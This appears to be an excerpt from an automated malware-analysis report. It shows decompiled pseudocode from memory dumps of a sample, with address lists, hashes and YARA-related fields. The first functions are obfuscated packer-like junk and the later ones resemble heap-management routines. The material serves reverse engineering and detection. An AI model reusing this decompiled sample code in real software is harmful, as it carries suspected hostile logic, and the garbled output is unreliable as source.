					__ebx = __ebx - 0x8d171277;
					 *0x463139c2 =  *0x463139c2 >> 0x5c;
					__edx =  *0xa2d28e6c;
					_pop(__esi);
					__ebp = __ebp +  *0x64504ec4;
					_push( *0x2b214499);
					 *0xf0d4ac3f =  *0xf0d4ac3f | __edx;
					 *0x3e757e18 = __bh;
					__ah = __ah ^  *0x181e5282;
					asm("scasb");
					__esp =  *0xfd0e7f0b;
					_pop( *0x6f524d83);
					asm("scasd");
					if(__ah < 0) {
						asm("sbb esi, 0x7d26a671");
						__ah = __ah ^  *0x1f6a9780;
						__esi = __esi ^ 0xaede54ea;
						_t5 = __ecx;
						__ecx =  *0x403aded9;
						 *0x403aded9 = _t5;
						if(__esi < 0) {
							asm("sbb edx, [0x53fa2679]");
							if((__al & 0x00000022) == 0) {
								asm("adc [0x9992987b], edi");
								_push(__edi);
								__ah = __ah &  *0x103e7e0;
								_push(__esp);
								__ebx = 0x4c78729c;
								__edx = __edx + 1;
								__ebx = 0x4c78729c ^  *0x7a2f1e9a;
								 *0x855b8fd5 =  *0x855b8fd5 | __ecx;
								__eax = 0x4c710b6d;
								__ecx = __ecx ^  *0x36252b3b;
								__ecx = __ecx + 1;
								asm("lodsd");
								__esi = __esi + 1;
								 *0x955a8484 =  *0x955a8484 + __dl;
								__eax = 0x4c710b6d -  *0x1ce4b229;
								asm("adc [0x5a54018], bl");
								_push( *0x5912f133);
								 *0x206571d3 =  *0x206571d3 ^ 0x4c710b6d;
								asm("movsw");
								_push(__edx);
								__ebp = __ebp + 1;
								__edi = __edi + 1;
								 *0xea728afa = 0x4c710b6d;
								asm("scasd");
								asm("adc edi, [0x1ffdd161]");
								asm("lodsb");
								asm("adc ecx, 0x10d8cd1");
								_t12 = __edx;
								__edx =  *0xcd60cb83;
								 *0xcd60cb83 = _t12;
								asm("stosd");
								if(__edi == 0) {
									__ebp = __ebp | 0x4d99387a;
									asm("rol dword [0xa016ad9e], 0xa9");
									__ebx = 0xc07f2306;
									 *0x1b624580 =  *0x1b624580 >> 0x7f;
									 *0xc2b9c23c =  *0xc2b9c23c << 0xf8;
									__edi =  *0xce52ee26;
									__ebp = __ebp -  *0xd76d5dbb;
									asm("lodsb");
									asm("rcl dword [0x3109fa64], 0x8a");
									asm("sbb [0x570aa664], esi");
									 *0x1c78ad3 =  *0x1c78ad3 >> 0x71;
									asm("sbb [0xfa9c660b], ecx");
									__ebx = 0xc07f2306 ^  *0xf1207e94;
									 *0xb3d6c1f9 =  *0xb3d6c1f9 >> 0xf0;
									_push( *0x983e1b0b);
									asm("rcl dword [0xf2b28b3d], 0x40");
									__ebx = 0xc07f2306 ^  *0xf1207e94 ^ 0xb3d6c1f8;
									asm("adc ebp, 0xcd70610e");
									__edx = __edx &  *0xf600972f;
									__ecx = __ecx + 1;
									__eax =  *0x6bf62262;
									__esp = __esp ^ 0xf60e9495;
									__ebp = __ebp &  *0x86bc4af4;
									 *0x6d69d60f =  *0x6d69d60f - __ecx;
									 *0xa54a1294 =  *0xa54a1294 << 0x8c;
									__ebx = 0xc07f2306 ^  *0xf1207e94 ^ 0xb3d6c1f8 |  *0xe1b964f4;
									__esp = __esp ^  *0xb7170564;
									if(( *0x22f7946c & __edx) >= 0) {
										__eax = __eax -  *0x2144a270;
										__bl = __bl -  *0x44f5ca12;
										L1();
									}
								}
							}
						}
					}
				}
				L1:
				 *0x9c861809 =  *0x9c861809 << 0xd5;
				asm("adc [0xf30d01e3], bl");
				 *0xa04b2c1c =  *0xa04b2c1c + _t24;
				_t22 = _t22 ^  *0xf7081c08;
				asm("rol dword [0x21042bcb], 0x70");
				 *0x947e500c = _t22;
				if(_t22 <= 0) {
					goto L1;
				} else {
					asm("sbb ebx, [0x30edc976]");
					asm("rcl dword [0x83fc7868], 0xb4");
					 *0x1bf75a08 =  *0x1bf75a08 >> 0xb0;
					asm("rol byte [0xd90529e6], 0xde");
					asm("movsb");
					_pop(_t17);
					 *0x5e9a8e15 =  *0x5e9a8e15 - _t17;
					_t20 = _t18 &  *0x486a5d4 ^  *0x1321321a;
					asm("sbb edx, [0xa12cca6e]");
					 *0x44fad925 =  *0x44fad925 + _t20;
					_t24 = _t24 + 0x82;
					_t18 = _t20 + 1;
					_pop(_t26);
					if(_t18 <= 0) {
						goto L1;
					} else {
						 *0x2bc6276 =  *0x2bc6276 << 0xa1;
						 *0xc9e46205 =  *0xc9e46205 >> 0x94;
						 *0x27137210 =  *0x27137210 ^ _t18;
						 *0xa6936b3d =  *0xa6936b3d | _t26;
						return _t17;
					}
				}
			}

0x0041d27d
0x0041d27d
0x0041d27f
0x0041d285
0x0041d28c
0x0041d292
0x0041d298
0x0041d29f
0x0041d2a5
0x0041d2a6
0x0041d2ac
0x0041d2b2
0x0041d2b8
0x0041d2be
0x0041d2ca
0x0041d2cb
0x0041d2d1
0x0041d2d7
0x0041d2d8
0x0041d2de
0x0041d2e4
0x0041d2ea
0x0041d2f0
0x0041d2f0
0x0041d2f0
0x0041d2f6
0x0041d2fc
0x0041d30a
0x0041d310
0x0041d316
0x0041d317
0x0041d31d
0x0041d31e
0x0041d324
0x0041d325
0x0041d32b
0x0041d331
0x0041d337
0x0041d33d
0x0041d344
0x0041d345
0x0041d349
0x0041d34f
0x0041d355
0x0041d35b
0x0041d361
0x0041d367
0x0041d369
0x0041d36a
0x0041d36b
0x0041d36c
0x0041d371
0x0041d372
0x0041d378
0x0041d379
0x0041d37f
0x0041d37f
0x0041d37f
0x0041d385
0x0041d386
0x0041d38c
0x0041d392
0x0041d399
0x0041d39f
0x0041d3ac
0x0041d3b3
0x0041d3b9
0x0041d3bf
0x0041d3cc
0x0041d3d3
0x0041d3d9
0x0041d3e0
0x0041d3e6
0x0041d3ec
0x0041d3f3
0x0041d3f9
0x0041d400
0x0041d406
0x0041d40c
0x0041d412
0x0041d413
0x0041d418
0x0041d41e
0x0041d42a
0x0041d430
0x0041d437
0x0041d43d
0x0041d449
0x0041d44f
0x0041d455
0x0041d45b
0x0041d460
0x0041d449
0x0041d386
0x0041d30a
0x0041d2f6
0x0041d2d8
0x0041d176
0x0041d176
0x0041d183
0x0041d189
0x0041d18f
0x0041d195
0x0041d19c
0x0041d1a3
0x00000000
0x0041d1a5
0x0041d1a5
0x0041d1ab
0x0041d1b2
0x0041d1b9
0x0041d1c0
0x0041d1c7
0x0041d1d4
0x0041d1da
0x0041d1e0
0x0041d1e6
0x0041d1ec
0x0041d1ef
0x0041d1f0
0x0041d1f1
0x00000000
0x0041d1f3
0x0041d1f3
0x0041d1fa
0x0041d201
0x0041d223
0x0041d229
0x0041d229
0x0041d1f1

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbb7f00f082e6a900372494b650b003fe2a38306338558e74835bbcbe8eb955a
Instruction ID: ed79e601462b0c8aa125b149caabe06dcbba02f3be581aa6d75f58487ff0be02
Opcode Fuzzy Hash: bbb7f00f082e6a900372494b650b003fe2a38306338558e74835bbcbe8eb955a
Instruction Fuzzy Hash: 7D517372804382DFD316EF38D9D9A463FB2F756320318835EC5A1925A6DB741256DF88

Uniqueness

Uniqueness Score: -1.00%

Function 0041E147, Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

			E0041E147(signed char __eax, signed char __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
				void* _v3;
				void* _t13;
				signed char _t20;
				signed int _t21;
				signed int _t26;
				signed char _t28;
				signed int _t31;
				signed int _t34;
				void* _t36;
				signed int _t38;
				signed int _t48;
				signed int _t50;
				void* _t52;

				_t52 = __eflags;
				_t38 = __esi;
				_t31 = __edi;
				_t26 = __edx;
				_t21 = __ecx;
				_t20 = __ebx;
				_t12 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										L1:
										asm("rcl byte [0x939ff7b7], 0x75");
										asm("rol byte [0x8f83e7b0], 0x96");
									} while (_t52 == 0);
									_push(0xdc624d74);
									_t31 = _t31 -  *0xc419e217;
									asm("adc ecx, [0x84e5c4bb]");
								} while (_t31 != 0);
								asm("adc edi, [0xdd634e75]");
								asm("adc cl, 0x2");
								_t21 = _t21 & 0x000000b0;
								asm("scasb");
							} while (_t21 >= 0);
							 *0xe77cd173 =  *0xe77cd173 >> 0xe3;
							asm("lodsb");
							_pop( *0x2f9d1616);
							asm("sbb dl, 0x1c");
							 *0x32c1ddbd =  *0x32c1ddbd - _t20;
							_t31 = (_t31 & 0xef4544a1) -  *0x85c02c16;
							asm("sbb [0xb2efca25], esp");
							_t26 = _t26 |  *0xa8e0cc32;
							 *0xc6a616ef =  *0xc6a616ef ^ _t12;
							_t21 = _t21 ^  *0xc1daa919;
							asm("adc cl, [0xa8e0cc32]");
							 *0xc83916ef =  *0xc83916ef << 0xbf;
						} while ( *0xc83916ef != 0);
						_t12 = _t12 &  *0xd8a8c4a8;
						_t38 = _t38 ^  *0x8b7a16ef;
						_t48 =  &_v3 &  *0xc68ff209;
						asm("sbb [0xe0cc32c1], ebx");
						_t26 = _t26 - 0xa8;
						 *0xc83816ef =  *0xc83816ef ^ _t26;
					} while ( *0xc83816ef != 0);
					 *0x52173a7b =  *0x52173a7b >> 0x38;
					_t13 = _t12 + 1;
					_push(_t13);
					asm("rcr byte [0x4052173a], 0x22");
					_push(_t13);
					_t28 = 0x81d04116 &  *0xef45d88d;
					asm("adc [0x4052173a], dh");
					 *0xef45d88d = _t38;
					_t20 = _t20 |  *0xaddd0fb4;
					asm("adc ebx, [0x87dbae16]");
					asm("sbb ebx, [0x1db40ffd]");
					 *0x2b16efa8 =  *0x2b16efa8 >> 0x36;
					asm("ror dword [0xbe0b1c6d], 0xb6");
					asm("ror dword [0xcc32c1ef], 0xaa");
					 *0x8a16efa8 =  *0x8a16efa8 | _t28;
					asm("sbb edx, 0xcc32bfdd");
					_t50 = 0xef45d88d + _t50 &  *0xefa8e0cc;
					 *0xfa34f216 =  *0xfa34f216 << 0x68;
					 *0xcc32b9d9 = _t13;
					asm("sbb [0x67b3c621], edx");
					_push( *0xc0d601ee);
					_pop(_t34);
					asm("stosb");
					 *0x395f828e =  *0x395f828e << 0x7d;
					asm("sbb cl, 0x14");
					 *0x32ccebb8 =  *0x32ccebb8 >> 0x71;
					 *0x8ce2a816 = _t34;
					asm("sbb dl, [0xa8e0cc32]");
					 *0x9e8e16ef =  *0x9e8e16ef - _t50;
					_t12 = 0xd79c0126;
					asm("rcr byte [0xba16efa8], 0x2e");
					asm("sbb dh, 0xf9");
					 *0x395fc3cc =  *0x395fc3cc |  *0x8ce2a816;
					_t21 = _t21 +  *0x16efa8e0 - 1 + 0xd2 +  *0xaece9d8d - 1;
					asm("rcl dword [0x9c420816], 0x9b");
					asm("stosd");
					 *0x32baf2c1 =  *0x32baf2c1 | _t48 ^ 0xefa8e0cc;
					asm("sbb eax, [0xefa8e0cc]");
					 *0x983e0416 =  *0x983e0416 << 0x3b;
					asm("cmpsw");
					_t38 = ( *0xef45d88d |  *0x9cba1d16 |  *0x453d99a1) &  *0xbe17ff2f &  *0x16d24939 & 0xbed3f5bd;
					_t36 = 0x81c42916;
					 *0x16d24939 =  *0x16d24939 << 0x44;
					 *0x71c621c =  *0x71c621c | 0xd79c0126;
					asm("movsb");
					_t26 = (_t28 - 0x000000e2 ^  *0xe0cc32c1) +  *0x16efa8e0;
					 *0x7c73a2fe =  *0x7c73a2fe >> 0xca;
					 *0xc4a8009a =  *0xc4a8009a - _t21;
					asm("adc bl, 0xa8");
					asm("adc esi, 0x16ef45d8");
					 *0x9ba0f4be =  *0x9ba0f4be - _t36;
					 *0xa899d1b4 =  *0xa899d1b4 + 0xd79c0126;
					_t31 = 0xcc32c1db;
					 *0x16d24939 =  *0x16d24939 & _t21;
				} while ( *0x16d24939 != 0);
				return 0xd79c0126;
			}

0x0041e147
0x0041e147
0x0041e147
0x0041e147
0x0041e147
0x0041e147
0x0041e147
0x0041e148
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e151
0x0041e151
0x0041e15a
0x0041e15f
0x0041e165
0x0041e165
0x0041e16e
0x0041e177
0x0041e17a
0x0041e17d
0x0041e17d
0x0041e180
0x0041e187
0x0041e18e
0x0041e194
0x0041e197
0x0041e1a3
0x0041e1a9
0x0041e1af
0x0041e1b5
0x0041e1bc
0x0041e1c2
0x0041e1c8
0x0041e1c8
0x0041e1db
0x0041e1e2
0x0041e1e8
0x0041e1ee
0x0041e1f4
0x0041e1f7
0x0041e1f7
0x0041e203
0x0041e20a
0x0041e20b
0x0041e217
0x0041e21e
0x0041e21f
0x0041e22a
0x0041e231
0x0041e23e
0x0041e24a
0x0041e262
0x0041e26d
0x0041e274
0x0041e27b
0x0041e285
0x0041e291
0x0041e2a8
0x0041e2ae
0x0041e2bb
0x0041e2c7
0x0041e2cd
0x0041e2d3
0x0041e2e0
0x0041e2e4
0x0041e2f5
0x0041e2f8
0x0041e305
0x0041e311
0x0041e317
0x0041e31d
0x0041e329
0x0041e336
0x0041e339
0x0041e33f
0x0041e343
0x0041e34a
0x0041e34b
0x0041e351
0x0041e357
0x0041e35e
0x0041e360
0x0041e366
0x0041e367
0x0041e36e
0x0041e374
0x0041e37a
0x0041e380
0x0041e387
0x0041e38d
0x0041e390
0x0041e396
0x0041e39c
0x0041e3a2
0x0041e3a3
0x0041e3a3
0x0041e3b5

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ca8e52f39b78c36bcf02a95d49ffc34e3d667f7bdbe71404fe287f8e31d3d7
Instruction ID: b59fa359fc619b4e0c71acb122afebb5e074404ac3a56f006173cb8c1a03342a
Opcode Fuzzy Hash: 10ca8e52f39b78c36bcf02a95d49ffc34e3d667f7bdbe71404fe287f8e31d3d7
Instruction Fuzzy Hash: D8514436548781DFEB01DF78D8967823FB1F786330749438AC9A19B1D2C7782596CB85

Uniqueness

Uniqueness Score: -1.00%

Function 014E2B28, Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E014E2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x1506110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E01432280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x1506110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E014E241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E0142FFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E014E3209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E014DA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E0142FFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E014DA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x1506110; // 0x86d24170
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}

0x014e2b28
0x014e2b30
0x014e2b35
0x014e2b37
0x014e2b3a
0x014e2b3d
0x014e2b44
0x014e2b4d
0x014e2b4d
0x014e2b50
0x014e2b54
0x014e2bb0
0x014e2bbd
0x014e2be8
0x014e2bef
0x014e2bf4
0x014e2bf7
0x014e2bfa
0x014e2bfd
0x014e2c02
0x014e2c02
0x014e2c0f
0x014e2c13
0x014e2c3b
0x014e2c4a
0x014e2c4f
0x014e2c52
0x014e2c52
0x014e2c59
0x014e2c62
0x014e2c62
0x014e2c69
0x014e2c15
0x014e2c18
0x014e2c19
0x014e2c21
0x014e2c29
0x014e2c2f
0x014e2c2f
0x014e2c29
0x014e2bbf
0x014e2bc2
0x014e2bc3
0x014e2bc9
0x014e2bc9
0x014e2c72
0x014e2c72
0x014e2b56
0x014e2b5c
0x014e2b62
0x014e2b64
0x014e2b72
0x014e2b77
0x014e2ba3
0x014e2ba3
0x014e2ba5
0x014e2baa
0x00000000
0x014e2baa
0x014e2b7e
0x014e2b84
0x014e2b86
0x014e2b97
0x014e2b9c
0x014e2b9e
0x014e2b9e
0x00000000
0x014e2b9e
0x014e2b8b
0x014e2b90
0x00000000
0x00000000
0x014e2b95
0x00000000
0x014e2b95
0x014e2b6b
0x00000000

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7263d03f671fe3166415f5d41a4bea08fa87ea009bd9699784432cbd8dc3afb7
Instruction ID: 3e79499b7503832073d4e14ca7c832c07e2e714822e8a49d5adcc41e26408ce8
Opcode Fuzzy Hash: 7263d03f671fe3166415f5d41a4bea08fa87ea009bd9699784432cbd8dc3afb7
Instruction Fuzzy Hash: BF414972A101156FDB24CF6CC888D6BB7EDEF58210B05866EE915CB3A0D6B0DD56C790

Uniqueness

Uniqueness Score: -1.00%

Function 014DD466, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E014DD466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x150d360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1506114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E014DDDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1506114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1506114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x150b1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x1506110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E014DD864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E0142FFB0(_t69, _t90, _t90 + 0xc);
				}
				return E0145B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

0x014dd475
0x014dd47b
0x014dd492
0x014dd49e
0x014dd4a4
0x014dd4ac
0x014dd4bc
0x014dd4be
0x014dd4c4
0x014dd4cc
0x014dd4dc
0x014dd4e1
0x014dd4f5
0x014dd4fb
0x014dd4fd
0x014dd501
0x014dd53d
0x014dd503
0x014dd507
0x014dd50e
0x014dd510
0x014dd520
0x014dd524
0x014dd526
0x014dd528
0x014dd52b
0x014dd52e
0x014dd530
0x014dd530
0x014dd533
0x014dd536
0x014dd537
0x014dd53b
0x00000000
0x00000000
0x014dd526
0x014dd4c6
0x014dd4c6
0x014dd4c8
0x014dd4c8
0x014dd4c8
0x014dd540
0x014dd545
0x014dd555
0x014dd55a
0x014dd55a
0x014dd560
0x014dd562
0x014dd56e
0x014dd56e
0x014dd577
0x014dd57d
0x014dd57d
0x014dd594
0x00000000

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded23acb97cb7bf96b24fba4ba18f031fc4c71b6db0397ab2c749578c37e1a63
Instruction ID: b2295849c2e762ae6dede8a0370f6af8093fbed87a0d73660df0a58d00a705fe
Opcode Fuzzy Hash: ded23acb97cb7bf96b24fba4ba18f031fc4c71b6db0397ab2c749578c37e1a63
Instruction Fuzzy Hash: 2B419271E001299BCF14CFADC8A1ABEB7F5FF88214B55422AE915EB390D670AD05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014E22AE, Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E014E22AE(void* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				void* _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				void* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E014E21E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x13fac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x13fac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x13fac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x13fac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x13fac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x13fac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x13fac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x13fac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x1506110; // 0x86d24170
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1506110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E0142FFB0(_t77, _t114, _t114);
						}
						_t63 = E014E2FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E01432280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}

0x014e22b9
0x014e22c2
0x014e22c6
0x014e22c8
0x014e22d8
0x014e22e2
0x014e2303
0x014e2314
0x014e2321
0x014e234a
0x014e235b
0x014e236c
0x014e2372
0x014e2376
0x014e238f
0x014e238f
0x014e23b4
0x014e23c6
0x014e23c9
0x014e23cc
0x014e23cf
0x014e23cf
0x014e23e9
0x014e23ee
0x014e23f8
0x014e23fb
0x014e23fb
0x014e2403
0x014e240a
0x014e2378
0x014e237b
0x014e2381
0x014e2385
0x014e2385
0x014e238d
0x00000000
0x00000000
0x014e238d
0x014e2376
0x014e2417

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d511c24cdc5b0336de197898a68919dd39ed20368856f8806150013ccb5f76a0
Instruction ID: a2221068275e4fa07b39ae7603f8a2c47003bdafdf170c7310e32d3c5681b430
Opcode Fuzzy Hash: d511c24cdc5b0336de197898a68919dd39ed20368856f8806150013ccb5f76a0
Instruction Fuzzy Hash: D04116711043424BC705DF29C8A9A7BBBE4EF95322F05465EF4D5CB2E2CA34D819DB92

Uniqueness

Uniqueness Score: -1.00%

Function 014E20A8, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E014E20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x1506110; // 0x86d24170
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x1506110; // 0x86d24170
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E014E2E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x1506110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E014E2E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x1506110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E014E2E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1506110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1506110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}

0x014e20a8
0x014e20b0
0x014e20b6
0x014e20ba
0x014e20be
0x014e20c4
